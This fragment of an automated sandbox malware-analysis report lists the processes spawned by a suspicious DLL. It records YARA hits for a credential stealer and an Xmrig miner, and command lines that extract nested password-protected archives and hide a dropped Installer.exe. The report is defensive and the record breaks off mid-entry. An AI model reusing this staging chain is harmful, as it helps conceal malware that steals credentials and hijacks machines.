                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1648946137.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1646851786.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1647706451.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1649257545.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1645741913.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1647006571.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1651874968.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1649492847.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1645578502.0000000002935000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1648747393.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1649364315.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1589055516.0000000002934000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1647801568.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1645960083.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1650396947.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1530908112.0000000002933000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1649640938.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1647964141.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1650698134.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1650927285.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1618412925.0000000002934000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1651620625.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1590244247.0000000002934000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1652377041.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1648111608.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1646498354.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1647439452.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1650206173.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1646729840.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1651442079.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1647095515.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1589140688.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1648508477.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1651051467.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1651358924.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1648623199.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1646390714.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1646084375.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1648361138.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1651541750.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1650826392.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1648832528.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1646276375.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1650575135.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1647208910.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1652008990.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1648223332.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1652320133.0000000002944000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1651214560.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1649107243.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1619768349.0000000002934000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1647345197.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1529572587.0000000002931000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1647558990.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1618010358.0000000002935000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1646185343.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1651692251.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1530492113.0000000002933000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:9
                                                                                                                                                                                                            Start time:06:19:28
                                                                                                                                                                                                            Start date:14/11/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:rundll32.exe "C:\Users\user\Desktop\n7ZKbApaa3.dll",WindowsHandle
                                                                                                                                                                                                            Imagebase:0x6a0000
                                                                                                                                                                                                            File size:61'440 bytes
                                                                                                                                                                                                            MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:10
                                                                                                                                                                                                            Start time:06:19:28
                                                                                                                                                                                                            Start date:14/11/2024
                                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                                                                                                                                                                                                            Imagebase:0x40000
                                                                                                                                                                                                            File size:43'016 bytes
                                                                                                                                                                                                            MD5 hash:5D1D74198D75640E889F0A577BBF31FC
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:11
                                                                                                                                                                                                            Start time:06:19:59
                                                                                                                                                                                                            Start date:14/11/2024
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exe"
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:3'125'704 bytes
                                                                                                                                                                                                            MD5 hash:CE901A874C9D157E48F83B1BE3D32AA6
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                                                            • Detection: 79%, ReversingLabs
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:12
                                                                                                                                                                                                            Start time:06:19:59
                                                                                                                                                                                                            Start date:14/11/2024
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\MPDIZKEMMIDUY52JFU3.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\MPDIZKEMMIDUY52JFU3.exe"
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:3'125'704 bytes
                                                                                                                                                                                                            MD5 hash:CE901A874C9D157E48F83B1BE3D32AA6
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                                                            • Detection: 79%, ReversingLabs
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:13
                                                                                                                                                                                                            Start time:06:20:03
                                                                                                                                                                                                            Start date:14/11/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                                                                                                                                                                                                            Imagebase:0x7ff60d070000
                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:14
                                                                                                                                                                                                            Start time:06:20:03
                                                                                                                                                                                                            Start date:14/11/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff620390000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:15
                                                                                                                                                                                                            Start time:06:20:03
                                                                                                                                                                                                            Start date:14/11/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\mode.com
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:mode 65,10
                                                                                                                                                                                                            Imagebase:0x7ff70bd00000
                                                                                                                                                                                                            File size:33'280 bytes
                                                                                                                                                                                                            MD5 hash:BEA7464830980BF7C0490307DB4FC875
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:16
                                                                                                                                                                                                            Start time:06:20:03
                                                                                                                                                                                                            Start date:14/11/2024
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:7z.exe e file.zip -p29586644319935208542739921766 -oextracted
                                                                                                                                                                                                            Imagebase:0x970000
                                                                                                                                                                                                            File size:468'992 bytes
                                                                                                                                                                                                            MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:17
                                                                                                                                                                                                            Start time:06:20:04
                                                                                                                                                                                                            Start date:14/11/2024
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:7z.exe e extracted/file_11.zip -oextracted
                                                                                                                                                                                                            Imagebase:0x970000
                                                                                                                                                                                                            File size:468'992 bytes
                                                                                                                                                                                                            MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:18
                                                                                                                                                                                                            Start time:06:20:04
                                                                                                                                                                                                            Start date:14/11/2024
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:7z.exe e extracted/file_10.zip -oextracted
                                                                                                                                                                                                            Imagebase:0x970000
                                                                                                                                                                                                            File size:468'992 bytes
                                                                                                                                                                                                            MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:19
                                                                                                                                                                                                            Start time:06:20:04
                                                                                                                                                                                                            Start date:14/11/2024
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:7z.exe e extracted/file_9.zip -oextracted
                                                                                                                                                                                                            Imagebase:0x970000
                                                                                                                                                                                                            File size:468'992 bytes
                                                                                                                                                                                                            MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:20
                                                                                                                                                                                                            Start time:06:20:05
                                                                                                                                                                                                            Start date:14/11/2024
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:7z.exe e extracted/file_8.zip -oextracted
                                                                                                                                                                                                            Imagebase:0x970000
                                                                                                                                                                                                            File size:468'992 bytes
                                                                                                                                                                                                            MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:21
                                                                                                                                                                                                            Start time:06:20:05
                                                                                                                                                                                                            Start date:14/11/2024
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:7z.exe e extracted/file_7.zip -oextracted
                                                                                                                                                                                                            Imagebase:0x970000
                                                                                                                                                                                                            File size:468'992 bytes
                                                                                                                                                                                                            MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:22
                                                                                                                                                                                                            Start time:06:20:05
                                                                                                                                                                                                            Start date:14/11/2024
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:7z.exe e extracted/file_6.zip -oextracted
                                                                                                                                                                                                            Imagebase:0x970000
                                                                                                                                                                                                            File size:468'992 bytes
                                                                                                                                                                                                            MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:23
                                                                                                                                                                                                            Start time:06:20:05
                                                                                                                                                                                                            Start date:14/11/2024
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:7z.exe e extracted/file_5.zip -oextracted
                                                                                                                                                                                                            Imagebase:0x970000
                                                                                                                                                                                                            File size:468'992 bytes
                                                                                                                                                                                                            MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:24
                                                                                                                                                                                                            Start time:06:20:06
                                                                                                                                                                                                            Start date:14/11/2024
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:7z.exe e extracted/file_4.zip -oextracted
                                                                                                                                                                                                            Imagebase:0x970000
                                                                                                                                                                                                            File size:468'992 bytes
                                                                                                                                                                                                            MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:26
                                                                                                                                                                                                            Start time:06:20:06
                                                                                                                                                                                                            Start date:14/11/2024
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:7z.exe e extracted/file_3.zip -oextracted
                                                                                                                                                                                                            Imagebase:0x970000
                                                                                                                                                                                                            File size:468'992 bytes
                                                                                                                                                                                                            MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:28
                                                                                                                                                                                                            Start time:06:20:07
                                                                                                                                                                                                            Start date:14/11/2024
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:7z.exe e extracted/file_2.zip -oextracted
                                                                                                                                                                                                            Imagebase:0x970000
                                                                                                                                                                                                            File size:468'992 bytes
                                                                                                                                                                                                            MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:29
                                                                                                                                                                                                            Start time:06:20:07
                                                                                                                                                                                                            Start date:14/11/2024
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:7z.exe e extracted/file_1.zip -oextracted
                                                                                                                                                                                                            Imagebase:0x970000
                                                                                                                                                                                                            File size:468'992 bytes
                                                                                                                                                                                                            MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:30
                                                                                                                                                                                                            Start time:06:20:07
                                                                                                                                                                                                            Start date:14/11/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:attrib +H "Installer.exe"
                                                                                                                                                                                                            Imagebase:0x7ff77ec90000
                                                                                                                                                                                                            File size:23'040 bytes
                                                                                                                                                                                                            MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:31
                                                                                                                                                                                                            Start time:06:20:07
                                                                                                                                                                                                            Start date:14/11/2024
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\main\Installer.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"Installer.exe"
                                                                                                                                                                                                            Imagebase:0x370000
                                                                                                                                                                                                            File size:625'464 bytes
                                                                                                                                                                                                            MD5 hash:89A069871324D35E25922F6FB881D514
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000001F.00000002.1911910899.00000000004CA000.00000004.00000001.01000000.0000000A.sdmp, Author: ditekSHen
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:33
                                                                                                                                                                                                            Start time:06:20:10
                                                                                                                                                                                                            Start date:14/11/2024
                                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                                                                                            Imagebase:0x90000
                                                                                                                                                                                                            File size:45'984 bytes
                                                                                                                                                                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000021.00000002.1979634479.000000000247D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:34
                                                                                                                                                                                                            Start time:06:20:11
                                                                                                                                                                                                            Start date:14/11/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
